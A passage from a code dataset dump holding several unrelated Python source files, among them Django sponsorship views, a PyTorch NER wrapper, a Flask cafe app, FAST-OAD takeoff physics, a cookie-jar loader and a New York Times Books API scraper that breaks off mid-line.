companies.models import Company\nfrom contacts.models import Contact\nfrom profiles.models import User\nfrom profiles.forms import UserListForm\nfrom ..forms import HackathonForm, SponsorshipForm, SponsorshipAssignOrganizersForm, SponsorshipsForUserForm\n\n@login_required\ndef sponsorships_show(request, h_pk):\n return render(request, \"sponsorships_show.html\", sponsorships_show_context(request, h_pk))\n\n@login_required\ndef sponsorships_summary(request, h_pk):\n show_ctx = sponsorships_show_context(request, h_pk)\n s = request.GET.get(\"show\")\n if s in show_ctx:\n sponsorships = show_ctx[s]\n show_type = s.replace('_', ' ')\n else:\n sponsorships = show_ctx[\"confirmed\"]\n show_type = \"confirmed\"\n\n return render(request, \"sponsorships_summary.html\", {\"sponsorships\": sponsorships, \"show_type\": show_type, \"faked\": show_type == \"uncontacted\"})\n\ndef sponsorships_show_context(request, h_pk):\n hackathon = get_object_or_404(Hackathon, pk=h_pk)\n\n def state_filter(states):\n return Sponsorship.objects.filter(hackathon=hackathon, status__in=states)\n\n def paginator_wrapper(name, obj):\n order_by = request.GET.get(f\"{name}_order_by\")\n if order_by and type(obj) != list:\n obj = obj.order_by(order_by)\n paginator = Paginator(obj, 25)\n return paginator.get_page(request.GET.get(f\"{name}_page\"))\n \n def get_q(name):\n return request.GET[\"q\"] if request.GET.get(\"q\") else request.GET.get(f\"{name}_q\")\n \n def sponsorship_wrapper(name, states):\n obj = state_filter(states).annotate(company__contacts__count=Count('company__contacts'))\n q = get_q(name)\n q_rules = lambda q: Q(company__name__icontains=q) | Q(company__industries__name__iexact=q) | Q(status__iexact=q) | Q(perks__name__iexact=q) | Q(tier__name__iexact=q)\n if q:\n if q.startswith(\"not:\"):\n q = q[4:]\n obj = obj.exclude(q_rules(q))\n else:\n obj = obj.filter(q_rules(q))\n obj = obj.select_related()\n return paginator_wrapper(name, obj.order_by(\"company__name\").distinct())\n \n def company_wrapper(name):\n companies_for_hackathon = Company.objects.filter(sponsorships__hackathon__pk=h_pk).values_list(\"pk\", flat=True)\n obj = Company.objects.exclude(pk__in=companies_for_hackathon)\n obj = obj.annotate(contacts__count=Count('contacts'))\n q = get_q(name)\n q_rules = lambda q: Q(name__icontains=q) | Q(industries__name__iexact=q)\n if q:\n if q.startswith(\"not:\"):\n q = q[4:]\n obj = obj.exclude(q_rules(q))\n else:\n obj = obj.filter(q_rules(q))\n order_by = request.GET.get(f\"{name}_order_by\")\n if order_by:\n obj = obj.order_by(order_by.replace(\"company__\", \"\"))\n else:\n obj = obj.order_by(\"name\")\n obj = obj.select_related()\n return paginator_wrapper(name, fake_sponsorship(obj.distinct()))\n\n def fake_sponsorship(company):\n return [Sponsorship(pk=0, company=c, tier=None, contribution=0) for c in company]\n \n confirmed = sponsorship_wrapper(\"confirmed\", [Sponsorship.CONFIRMED, Sponsorship.PAID])\n in_progress = sponsorship_wrapper(\"in_progress\", [Sponsorship.CONTACTED, Sponsorship.RESPONDED])\n dead = sponsorship_wrapper(\"dead\", [Sponsorship.GHOSTED, Sponsorship.DENIED])\n uncontacted = company_wrapper(\"uncontacted\")\n\n return {\n \"confirmed\": confirmed,\n \"in_progress\": in_progress,\n \"dead\": dead,\n \"uncontacted\": uncontacted,\n }\n\n@login_required\ndef sponsorship_new(request, h_pk):\n if request.method == \"POST\":\n form = SponsorshipForm(request.POST, hackathon=Hackathon.objects.get(pk=h_pk))\n if form.is_valid():\n sponsorship = form.save(commit=True)\n sponsorship.perks.set(form.cleaned_data[\"perks\"])\n # sponsorship.tiers.set(form.cleaned_data[\"tiers\"])\n sponsorship.save()\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"hackathons:sponsorships:view\", h_pk=h_pk, pk=sponsorship.company.pk)\n else:\n company_pk = request.GET.get(\"company\")\n initial = {\n \"hackathon\": get_object_or_404(Hackathon, pk=h_pk),\n \"company\": get_object_or_404(Company, pk=company_pk) if company_pk else None,\n }\n form = SponsorshipForm(initial=initial, hackathon=Hackathon.objects.get(pk=h_pk))\n return render(request, \"sponsorship_new.html\", {\"form\": form})\n\n@login_required\ndef sponsorship_edit(request, h_pk, pk):\n sponsorship = get_object_or_404(Sponsorship, hackathon__pk=h_pk, company__pk=pk)\n if request.method == \"POST\":\n form = SponsorshipForm(request.POST, instance=sponsorship, hackathon=sponsorship.hackathon)\n if form.is_valid():\n sponsorship = form.save(commit=True)\n sponsorship.perks.set(form.cleaned_data[\"perks\"])\n # sponsorship.tiers.set(form.cleaned_data[\"tiers\"])\n sponsorship.save()\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"hackathons:sponsorships:view\", h_pk=h_pk, pk=sponsorship.company.pk)\n else:\n form = SponsorshipForm(instance=sponsorship, hackathon=sponsorship.hackathon)\n return render(request, \"sponsorship_edit.html\", {\"form\": form, \"sponsorship\": sponsorship})\n\n@login_required\ndef sponsorship_delete(request, h_pk, pk):\n sponsorship = get_object_or_404(Sponsorship, hackathon__pk=h_pk, company__pk=pk)\n if request.method == \"POST\" and request.POST.get(\"delete\") == \"yes\":\n sponsorship.delete()\n messages.success(request, f\"Deleted sponsorship {sponsorship}\")\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"hackathons:sponsorships:show\", h_pk=h_pk)\n return render(request, \"sponsorship_delete.html\", sponsorship_detail_context(request, h_pk, pk))\n\n@login_required\ndef sponsorship_detail(request, h_pk, pk):\n return render(request, \"sponsorship_detail.html\", sponsorship_detail_context(request, h_pk, pk))\n\ndef sponsorship_detail_context(request, h_pk, pk):\n company = get_object_or_404(Company, pk=pk)\n\n sponsorship = Sponsorship.objects.filter(hackathon__pk=h_pk, company__pk=pk)\n sponsorship = sponsorship[0] if sponsorship else None\n\n lead_contacts = sponsorship.leads.all().values_list('contact__id', flat=True) if sponsorship else []\n non_lead_contacts = set(company.contacts.all().values_list('id', flat=True)) - set(lead_contacts)\n\n contacts = combine_lead_and_contacts(lead_contacts, non_lead_contacts)\n\n return {\n \"sponsorship\": sponsorship,\n \"company\": company,\n \"contacts\": contacts,\n \"no_contacted_employees\": len(lead_contacts) == 0 if sponsorship else False\n }\n\ndef combine_lead_and_contacts(lead_contact_ids, non_lead_contact_ids):\n contacts = [{\"lead\": lead, \"contact\": lead.contact} for lead in Lead.objects.filter(contact__id__in=lead_contact_ids)]\n contacts += [{\"contact\": contact} for contact in Contact.objects.filter(id__in=non_lead_contact_ids)]\n\n return contacts\n\n@login_required\ndef sponsorships_for_user_list(request, h_pk):\n if request.POST.get(\"user\"):\n return redirect(\"hackathons:sponsorships:for_user\", h_pk=h_pk, user_pk=request.POST.get(\"user\"))\n else:\n return redirect(\"hackathons:sponsorships:for_user_all\", h_pk=h_pk)\n #form = UserListForm()\n #return render(request, \"sponsorships_for_user_list.html\", {\"form\": form})\n\ndef sponsorship_paginator(request, obj):\n q = request.GET.get('q')\n if q:\n obj = obj.filter(Q(company__name__icontains=q) | Q(company__industries__name__iexact=q) | Q(status__iexact=q) | Q(perks__name__iexact=q) | Q(tier__name__iexact=q))\n obj = obj.select_related()\n order_by = request.GET.get('order_by')\n if order_by:\n obj = obj.order_by(*order_by.split(',')).distinct()\n else:\n obj = obj.order_by(\"company__name\").distinct()\n paginator = Paginator(obj, 25)\n sponsorships = paginator.get_page(request.GET.get(\"page\"))\n return sponsorships\n\n@login_required\ndef sponsorships_for_user(request, h_pk, user_pk):\n user = get_object_or_404(User, pk=user_pk)\n obj = Sponsorship.objects.filter(hackathon__pk=h_pk, organizer_contacts__pk=user_pk)\n sponsorships = sponsorship_paginator(request, obj)\n\n return render(request, \"sponsorships_for_user.html\", {\n \"form\": UserListForm(initial={\"user\": user}),\n \"user\": user,\n \"sponsorships\": sponsorships,\n })\n\n@login_required\ndef sponsorships_for_user_all(request, h_pk):\n user_ids = set(Sponsorship.objects.filter(hackathon__pk=h_pk)\n .order_by('organizer_contacts__last_name','organizer_contacts__first_name')\n .values_list('organizer_contacts__pk', flat=True))\n user_objs = User.objects.filter(pk__in=user_ids)\n\n users = []\n for u in user_objs:\n sps = Sponsorship.objects.filter(hackathon__pk=h_pk, organizer_contacts__pk=u.pk)\n users.append({\n \"user\": u,\n \"sponsorships\": sps,\n })\n \n\n return render(request, \"sponsorships_for_user_all.html\", {\n \"form\": UserListForm(),\n \"users\": users,\n })\n\n@login_required\ndef sponsorship_assign_organizers(request, h_pk, pk):\n sponsorship = get_object_or_404(Sponsorship, hackathon__pk=h_pk, company__pk=pk)\n if request.method == \"POST\":\n form = SponsorshipAssignOrganizersForm(request.POST)\n if form.is_valid():\n users = form.cleaned_data['users']\n sp = form.cleaned_data['sponsorship']\n sp.organizer_contacts.clear()\n for u in users:\n sp.organizer_contacts.add(u)\n sp.save()\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"hackathons:sponsorships:view\", h_pk=h_pk, pk=sponsorship.company.pk)\n else:\n initial = {\"sponsorship\": sponsorship, \"users\": User.objects.filter(sponsorships=sponsorship)}\n form = SponsorshipAssignOrganizersForm(initial=initial)\n return render(request, \"sponsorship_assign_organizers.html\", {\"form\": form, \"sponsorship\": sponsorship})\n\n@login_required\ndef sponsorships_for_user_modify(request, h_pk, user_pk):\n hackathon = get_object_or_404(Hackathon, pk=h_pk)\n user = get_object_or_404(User, pk=user_pk)\n if request.method == \"POST\":\n form = SponsorshipsForUserForm(request.POST, hackathon=hackathon)\n if form.is_valid():\n user = form.cleaned_data['user']\n sps = form.cleaned_data['sponsorships']\n user.sponsorships.clear()\n for sp in sps:\n user.sponsorships.add(sp)\n user.save()\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"hackathons:sponsorships:for_user\", h_pk=h_pk, user_pk=user.pk)\n else:\n initial = {\"user\": user, \"sponsorships\": Sponsorship.objects.filter(hackathon=hackathon, organizer_contacts=user)}\n form = SponsorshipsForUserForm(initial=initial, hackathon=hackathon)\n return render(request, \"sponsorships_for_user_modify.html\", {\"form\": form, \"user\": user})\n","repo_name":"fuseumass/hackerforce","sub_path":"hackathons/views/sponsorships.py","file_name":"sponsorships.py","file_ext":"py","file_size_in_byte":11727,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"82"} +{"seq_id":"73136076747","text":"from .model import Model\nfrom .globals import tag2label,label2tag\nimport pickle\nimport asyncio\nimport numpy as np\nimport string\nimport torch\nimport os\n\n__all__ = ['ModelWrapper']\n\n\nclass ModelWrapper:\n def __init__(self,\n args):\n self.word2id = self.read_dictionary(args.vocab_path)\n args.word_size = len(self.word2id)\n args.label_size = len(tag2label)\n\n self._use_cuda = args.use_cuda\n if self._use_cuda and not torch.cuda.is_available():\n self._use_cuda = False\n self._device = torch.device('cuda' if self._use_cuda else 'cpu')\n\n self._model = Model(args)\n if self._use_cuda:\n self._model.load_state_dict(torch.load(args.save))\n else:\n self._model.load_state_dict(torch.load(args.save,map_location='cpu'))\n\n\n if self._use_cuda:\n self._model.to(self._device)\n\n self._model.eval()\n \n async def startup(self,app):\n pass\n \n def read_dictionary(self,vocab_path):\n \"\"\"\n\n :param vocab_path:\n :return:\n \"\"\"\n vocab_path = os.path.join(vocab_path)\n with open(vocab_path, 'rb') as fr:\n word2id = pickle.load(fr)\n print('vocab_size:', len(word2id))\n return word2id\n \n def encode_query(self,query):\n sents = []\n \n sent_ = list(query.strip())\n # print(sent_)\n sentence_id = []\n for word in sent_:\n if word.isdigit():\n word = ''\n # elif ('\\u0041' <= word <= '\\u005a') or ('\\u0061' <= word <= '\\u007a'):\n # word = ''\n if word not in self.word2id:\n word = ''\n sentence_id.append(self.word2id[word])\n \n sents.append(sentence_id)\n # print(sents)\n seq_len_list = [len(inst) for inst in sents]\n sents = np.array(sents)\n\n with torch.no_grad():\n inst_data_tensor = torch.from_numpy(sents)\n seq_len = torch.LongTensor(seq_len_list)\n \n if self._use_cuda:\n\n inst_data_tensor = inst_data_tensor.cuda()\n seq_len = seq_len.cuda()\n\n return inst_data_tensor,seq_len\n\n def decode_pre(self,pred):\n _tags = [label2tag[tag] for tag in pred]\n res = {}\n for i in range(len(_tags)):\n tag = _tags[i].split('_')\n if 'B' in tag:\n label = tag[1].lower()\n if label not in res:\n res[label] = []\n res[label].append([i,i+1])\n for j in range(i+1,len(_tags)):\n itag = _tags[j].split('_')\n if itag[0] == 'I' and itag[1] == tag[1]:\n res[label][-1][1] = j + 1\n i = j + 1\n else:\n res[label][-1][1] = j\n break\n return res\n\n\n \n async def predict(self,query):\n word,seq_len = self.encode_query(query)\n with torch.no_grad():\n pred = self._model.predict(word,seq_len)\n decode = self.decode_pre(pred.numpy()[0]) \n res = {}\n for k in decode:\n res[k] = []\n for name in decode[k]:\n res[k].append(query[name[0]:name[1]])\n print('res',pred.numpy()[0],res)\n return res\n","repo_name":"feliciaren/NER","sub_path":"ner-service/nermodel/model_wrapper.py","file_name":"model_wrapper.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"34558771211","text":"#! /usr/bin/env python\n\nimport time\nimport argparse\n\nimport pandas\n\nimport pyniverse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--input_file\",\n required=True,\n help=\"the csv file downloaded from the Zooniverse containing all the classifcations done to date\",\n )\n parser.add_argument(\n \"--output_stem\",\n default=\"test\",\n help=\"the first part of each of the output files\",\n )\n parser.add_argument(\n \"--from_date\",\n default=False,\n help=\"if required, a date after which any graph will be plotted. ISO format e.g. 2017-04-07\",\n )\n parser.add_argument(\n \"--to_date\",\n default=False,\n help=\"if required, a date before which any graph will be plotted. ISO format e.g. 2017-04-07 \",\n )\n parser.add_argument(\n \"--timings\",\n action=\"store_true\",\n default=False,\n help=\"print the time taken for each step\",\n )\n parser.add_argument(\n \"--private_project\",\n action=\"store_true\",\n default=False,\n help=\"whether the project is private and therefore do not filter out non-live classifications\",\n )\n options = parser.parse_args()\n\n print(\"Reading classifications from CSV file...\")\n start = time.time()\n if options.private_project:\n current_classifications = pyniverse.Classifications(\n zooniverse_file=options.input_file,\n from_date=options.from_date,\n to_date=options.to_date,\n live_rows=not (options.private_project),\n )\n else:\n current_classifications = pyniverse.Classifications(\n zooniverse_file=options.input_file,\n from_date=options.from_date,\n to_date=options.to_date,\n )\n if options.timings:\n print(\"%.1f seconds\" % (time.time() - start))\n\n # Creating users table...\n current_classifications.create_users_table()\n\n # Plotting graphs...\n for sampling_time in [\"month\", \"week\", \"day\"]:\n current_classifications.plot_classifications_by_time(\n sampling=sampling_time,\n filename=\"graphs/\"\n + options.output_stem\n + \"-classifications-\"\n + sampling_time\n + \".pdf\",\n add_cumulative=True,\n )\n current_classifications.plot_users_by_time(\n sampling=sampling_time,\n filename=\"graphs/\"\n + options.output_stem\n + \"-users-\"\n + sampling_time\n + \".pdf\",\n add_cumulative=True,\n )\n\n current_classifications.plot_user_classification_distribution(\n filename=\"graphs/\" + options.output_stem + \"-user-distribution.pdf\"\n )\n\n print(current_classifications)\n\n # print(\"Saving PKL file...\")\n # current_classifications.save_pickle(\"dat/\"+options.output_stem+\".pkl\")\n","repo_name":"fowler-lab/pyniverse","sub_path":"bin/zooniverse-classifications-analyse.py","file_name":"zooniverse-classifications-analyse.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"} +{"seq_id":"3349993603","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf import FlaskForm\nfrom flask_bootstrap import Bootstrap5\nfrom wtforms import StringField, SubmitField, SelectField\nfrom wtforms.validators import DataRequired, URL\nimport os\n\napp = Flask(__name__)\n\nbootstrap = Bootstrap5(app)\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///cafes.db\"\napp.config['SECRET_KEY'] = os.environ.get(\"SECRET_KEY\")\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\nclass Cafe(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), unique=True, nullable=False)\n map_url = db.Column(db.String(500), nullable=False)\n img_url = db.Column(db.String(500), nullable=False)\n location = db.Column(db.String(250), nullable=False)\n seats = db.Column(db.String(250), nullable=False)\n has_toilet = db.Column(db.Boolean, nullable=False)\n has_wifi = db.Column(db.Boolean, nullable=False)\n has_sockets = db.Column(db.Boolean, nullable=False)\n can_take_calls = db.Column(db.Boolean, nullable=False)\n coffee_price = db.Column(db.String(250), nullable=True)\n\n\nclass CafeForm(FlaskForm):\n cafe = StringField(\"Cafe Name\", validators=[DataRequired()])\n map_url = StringField(\"Location on Google Map (URL)\", validators=[URL(message=\"Invalid URL\")])\n img_url = StringField(\"Image URL\", validators=[URL(message=\"Invalid URL\")])\n location = StringField(\"Location\", validators=[DataRequired()])\n has_sockets = SelectField(\"Has sockets\", choices=[1, 0])\n has_toilet = SelectField(\"Has toilet\", choices=[1, 0])\n has_wifi = SelectField(\"Has wifi\", choices=[1, 0])\n can_take_calls = SelectField(\"Can take calls\", choices=[1, 0])\n seats = SelectField(\"How many seats\", choices=[\"10-20\", \"20-30\", \"30-40\", \"40-50\", \"50+\"])\n coffee_price = StringField(\"Coffee price\", validators=[DataRequired()])\n submit = SubmitField('Submit', render_kw={'style': 'margin-top: 10px'})\n\n\n@app.route(\"/\")\ndef home():\n cafes = Cafe.query.order_by(Cafe.id).all()\n return render_template(\"index.html\", cafes=cafes)\n\n\n@app.route(\"/add\", methods=[\"GET\", \"POST\"])\ndef add_cafe():\n form = CafeForm()\n if form.validate_on_submit():\n new_cafe = Cafe(\n name=request.form.get(\"cafe\"),\n map_url=request.form.get(\"map_url\"),\n img_url=request.form.get(\"img_url\"),\n location=request.form.get(\"location\"),\n seats=request.form.get(\"seats\"),\n has_toilet=int(request.form.get(\"has_toilet\")),\n has_wifi=int(request.form.get(\"has_wifi\")),\n has_sockets=int(request.form.get(\"has_sockets\")),\n can_take_calls=int(request.form.get(\"can_take_calls\")),\n coffee_price=f'£{request.form.get(\"coffee_price\")}'\n )\n db.session.add(new_cafe)\n db.session.commit()\n return redirect(url_for(\"home\"))\n return render_template(\"add.html\", form=form)\n\n\n@app.route(\"/delete\")\ndef delete():\n cafe_id = request.args.get('id')\n cafe = Cafe.query.get(cafe_id)\n db.session.delete(cafe)\n db.session.commit()\n return redirect(url_for(\"home\"))\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Kaelmur/Coffee-Wifi-REST","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"10964081816","text":"def is_valid_walk(walk):\n #determine if walk is valid\n # Variabeln fuer jede Himmelsrichtung anlegen\n nord = 0\n sued = 0\n west = 0\n ost = 0\n # Liste mit For-Schleife durchlaufen und die Richtungen pruefen\n for direction in walk:\n # gueltige Himmelsrichtungen den entsprechenden Variablen zuordnen\n # nach oben zaehlen\n if direction == 'n':\n nord = nord + 1\n elif direction == 's':\n sued = sued + 1\n elif direction == 'w':\n west = west + 1\n elif direction == 'e':\n ost = ost + 1\n # die Laenge der Liste berechnen\n count = len(walk)\n # Print zum preufen\n print(nord)\n print(sued)\n print(ost)\n print(west)\n print(count)\n # pruefen ob die Anzahl der Bewegungen gleich sind\n # Ausgangspunkt muss wieder erreicht werden\n # Liste darf auch nicht laenger als 10 sein (siehe Aufgabe)\n if nord == sued and west == ost and count == 10:\n return True\n else:\n return False","repo_name":"neovegeto/Codewars---my-solutions","sub_path":"Take a Ten Minutes Walk.py","file_name":"Take a Ten Minutes Walk.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"32642057356","text":"import logging\nfrom dataclasses import dataclass\nfrom typing import List\n\nfrom numpy import cos, sin\nfrom scipy.constants import g\n\nfrom fastoad.model_base import FlightPoint\nfrom fastoad.models.performances.mission.exceptions import FastFlightSegmentIncompleteFlightPoint\nfrom fastoad.models.performances.mission.segments.base import RegisterSegment\nfrom fastoad.models.performances.mission.segments.time_step_base import AbstractTakeOffSegment\n\n_LOGGER = logging.getLogger(__name__) # Logger for this module\n\n# FIXME: This class is a bit awkward, because get_gamma_and_acceleration() knows\n# only the current flight point, which prevents from using the slope derivative.\n# A redefinition of the abstract class is needed.\n\n\n@RegisterSegment(\"end_of_takeoff\")\n@dataclass\nclass EndOfTakeoffSegment(AbstractTakeOffSegment):\n \"\"\"\n Computes a flight path segment where altitude is modified with constant pitch angle.\n As a result, the slope angle and angle of attack are changing through time.\n Updates are based on longitudinal dynamics equations simplifies with the assumption\n of constant pitch angle.\n\n .. note:: **Setting target**\n\n Target is an altitude and should be set to the safety altitude.\n\n \"\"\"\n\n def compute_next_flight_point(\n self, flight_points: List[FlightPoint], time_step: float\n ) -> FlightPoint:\n \"\"\"\n Computes time, altitude, speed, mass and ground distance of next flight point.\n\n :param flight_points: previous flight points\n :param time_step: time step for computing next point\n :return: the computed next flight point\n \"\"\"\n previous = flight_points[-1]\n next_point = super().compute_next_flight_point(flight_points, time_step)\n\n self.compute_next_gamma(next_point, previous)\n return next_point\n\n def complete_flight_point(self, flight_point: FlightPoint):\n \"\"\"\n Redefinition, computes data for provided flight point.\n\n Assumes that it is already defined for time, altitude, mass,\n ground distance and speed (TAS, EAS, or Mach).\n\n :param flight_point: the flight point that will be completed in-place\n \"\"\"\n flight_point.engine_setting = self.engine_setting\n\n self._complete_speed_values(flight_point)\n\n self.compute_propulsion(flight_point)\n\n # Calls modified method to add gamma_dot to flight points.\n self.get_gamma_and_acceleration(flight_point)\n\n def get_distance_to_target(\n self, flight_points: List[FlightPoint], target: FlightPoint\n ) -> float:\n current = flight_points[-1]\n\n if target.altitude is not None:\n return target.altitude - current.altitude\n\n raise FastFlightSegmentIncompleteFlightPoint(\n \"No valid target definition for altitude change.\"\n )\n\n def get_next_alpha(self, previous_point: FlightPoint, time_step: float) -> float:\n \"\"\"\n Computes angle of attack (alpha) based on gamma_dot, using constant pitch angle assumption.\n\n :param previous_point: the flight point from which next alpha is computed\n :param time_step: the duration between computed flight point and previous_point\n \"\"\"\n\n return previous_point.alpha - time_step * previous_point.slope_angle_derivative\n\n @staticmethod\n def compute_next_gamma(next_point: FlightPoint, previous_point: FlightPoint):\n \"\"\"\n Computes slope angle (gamma) based on gamma_dot\n\n :param next_point: the next flight point\n :param previous_point: the flight point from which next gamma is computed\n \"\"\"\n time_step = next_point.time - previous_point.time\n next_point.slope_angle = (\n previous_point.slope_angle + time_step * previous_point.slope_angle_derivative\n )\n\n def get_gamma_and_acceleration(self, flight_point: FlightPoint):\n \"\"\"\n Redefinition : computes slope angle derivative (gamma_dot) and x-acceleration.\n Replaces CL, CD, lift dan drag values (for ground effect and accelerated flight)\n\n :param flight_point: parameters after propulsion model has been called\n (i.e. mass, thrust and drag are available)\n \"\"\"\n thrust = flight_point.thrust\n mass = flight_point.mass\n airspeed = flight_point.true_airspeed\n alpha = flight_point.alpha\n gamma = flight_point.slope_angle\n\n atm = self._get_atmosphere_point(flight_point.altitude)\n\n modified_polar = self.polar_modifier.modify_polar(self.polar, flight_point)\n CL = modified_polar.cl(alpha)\n CD = modified_polar.cd(CL)\n\n drag_aero = 0.5 * atm.density * self.reference_area * airspeed ** 2 * CD\n lift = 0.5 * atm.density * self.reference_area * airspeed ** 2 * CL\n\n gamma_dot = (thrust * sin(alpha) + lift - mass * g * cos(gamma)) / mass / airspeed\n acceleration = (thrust * cos(alpha) - drag_aero - mass * g * sin(gamma)) / mass\n\n flight_point.acceleration = acceleration\n flight_point.slope_angle_derivative = gamma_dot\n flight_point.drag = drag_aero\n flight_point.lift = lift\n flight_point.CL = CL\n flight_point.CD = CD\n","repo_name":"fast-aircraft-design/FAST-OAD","sub_path":"src/fastoad/models/performances/mission/segments/registered/takeoff/end_of_takeoff.py","file_name":"end_of_takeoff.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"82"} +{"seq_id":"69870459790","text":"from cookielib import LoadError, _warn_unhandled_exception, Cookie\nimport cookielib\nimport re, time\n\n__author__ = 'danielevertsson'\n\nclass MyMozillaCookieJar(cookielib.MozillaCookieJar):\n\n def _really_load(self, f, filename, ignore_discard, ignore_expires):\n now = time.time()\n\n magic = f.readline()\n if not re.search(self.magic_re, magic):\n f.close()\n raise LoadError(\n \"The cookie does not appear to be in Netscape format. Check that the first line is:
# Netscape HTTP Cookie File\")\n\n try:\n while 1:\n line = f.readline()\n if line == \"\": break\n \n # last field may be absent, so keep any trailing tab\n if line.endswith(\"\\n\"): line = line[:-1]\n\n # skip comments and blank lines XXX what is $ for?\n if (line.strip().startswith((\"#\", \"$\")) or\n line.strip() == \"\"):\n continue\n\n domain, domain_specified, path, secure, expires, name, value = \\\n line.split(\"\\t\")\n secure = (secure == \"TRUE\")\n domain_specified = (domain_specified == \"TRUE\")\n if name == \"\":\n # cookies.txt regards 'Set-Cookie: foo' as a cookie\n # with no name, whereas cookielib regards it as a\n # cookie with no value.\n name = value\n value = None\n\n initial_dot = domain.startswith(\".\")\n assert domain_specified == initial_dot\n\n discard = False\n if expires == \"\":\n expires = None\n discard = True\n\n # assume path_specified is false\n c = Cookie(0, name, value,\n None, False,\n domain, domain_specified, initial_dot,\n path, False,\n secure,\n expires,\n discard,\n None,\n None,\n {})\n if not ignore_discard and c.discard:\n continue\n if not ignore_expires and c.is_expired(now):\n continue\n self.set_cookie(c)\n\n except IOError:\n raise\n except AssertionError:\n raise AssertionError(\"Cookie does not follow Netscape format. Check that the values only are seperated by tab (\\\\t)\" + self._parse_failed_cookie_message(line))\n except Exception as ex:\n raise Exception(ex.message + self._parse_failed_cookie_message(line))\n\n def _parse_failed_cookie_message(self, cookie):\n return \"

Failed to load cookie:
%r
\" % (cookie)","repo_name":"its-dirg/oictestGui","sub_path":"src/oictestGui/my_mozilla_cookie_jar.py","file_name":"my_mozilla_cookie_jar.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"23664857635","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 21 14:18:24 2020\r\n\r\n@author: jijoj\r\n\"\"\"\r\nnumber = [1,2,3,4,5]\r\nfor x in number:\r\n if x==3:\r\n continue \r\n print(x)","repo_name":"JijoJose2002/python","sub_path":"Pythons/continue in loop.py","file_name":"continue in loop.py","file_ext":"py","file_size_in_byte":175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"35407049092","text":"# %%\nimport requests\nfrom pprint import pprint\nfrom api_keys import api_key\nimport pandas as pd\nimport time\n\n\n#Function for finding all list_name in NYT_API\ndef list_name_maker(url=\"https://api.nytimes.com/svc/books/v3/lists/names.json?\"+\"api-key=\"+api_key):\n response_=requests.get(url).json()\n result_length=response_[\"num_results\"]\n list_name=[response_[\"results\"][i][\"list_name\"] for i in range(59)]\n list_name_encoded=[response_[\"results\"][i][\"list_name_encoded\"] for i in range(59)]\n oldest_published_date=[response_[\"results\"][i][\"oldest_published_date\"] for i in range(59)]\n newest_published_date=[response_[\"results\"][i][\"newest_published_date\"] for i in range(59)]\n updated=[response_[\"results\"][i][\"updated\"] for i in range(59)]\n list_dict={\"list_name\":list_name,\n \"list_name_encoded\":list_name_encoded,\n \"oldest_published_date\":oldest_published_date,\n \"newest_published_date\":newest_published_date,\n \"updated\":updated} \n \n \n list_df=pd.DataFrame(list_dict)\n #list_df.to_csv(\"output/NYT_list.csv\",index=False)\n return list_df\n\n#list_name_df=list_name_maker()\n\n#Function for getting Best Sellers List details of one category and making a \n#dataframe and finding previous_published_date\n\ndef best_book(date='current',query='hardcover-fiction',api_key=api_key):\n url=\"https://api.nytimes.com/svc/books/v3/lists\"\n query_url = url + \"/\" + date + \"/\" + query +\".json?\"+\"api-key=\" + api_key\n resp=requests.get(query_url).json()\n num_results=len(resp[\"results\"]['books'])\n rank=[resp[\"results\"]['books'][i][\"rank\"] for i in range(num_results)]\n primary_isbn10=[resp[\"results\"]['books'][i][\"primary_isbn10\"] for i in range(num_results)]\n primary_isbn13=[resp[\"results\"]['books'][i][\"primary_isbn13\"] for i in range(num_results)]\n publisher=[resp[\"results\"]['books'][i][\"publisher\"] for i in range(num_results)]\n title=[resp[\"results\"]['books'][i][\"title\"] for i in range(num_results)]\n author=[resp[\"results\"]['books'][i][\"author\"] for i in range(num_results)]\n categry=[query for i in range(num_results)]\n pub_date=[date for i in range(num_results)]\n \n #getting previous_published_date\n previous_published_date=resp[\"results\"]['previous_published_date']\n\n category_dict={\"rank\":rank,\n \"primary_isbn10\":primary_isbn10,\n \"primary_isbn13\":primary_isbn13,\n \"publisher\":publisher,\n \"title\":title,\n \"author\":author,\n \"category\":categry,\n \"pub_date\":pub_date} \n \n return pd.DataFrame(category_dict),previous_published_date\n\n\n\n#Function for getting 28 published date and dataframes and concatenating them on 1 dataframe\ndef best_ctg_maker(query='hardcover-fiction',api_key=api_key):\n dfs=[]\n previous_dates=[\"current\"]\n for i in range(28):\n df=best_book(date=previous_dates[i],query=query)\n dfs.append(df[0])\n previous_dates.append(df[1])\n time.sleep(10)\n return pd.concat(dfs)\n\n\n# Function for concatenating all categories dataframes in one\ndef best_book_df_maker():\n costum_list=[\"Hardcover Fiction\",\"Hardcover Nonfiction\",\"E-Book Fiction\",\"E-Book 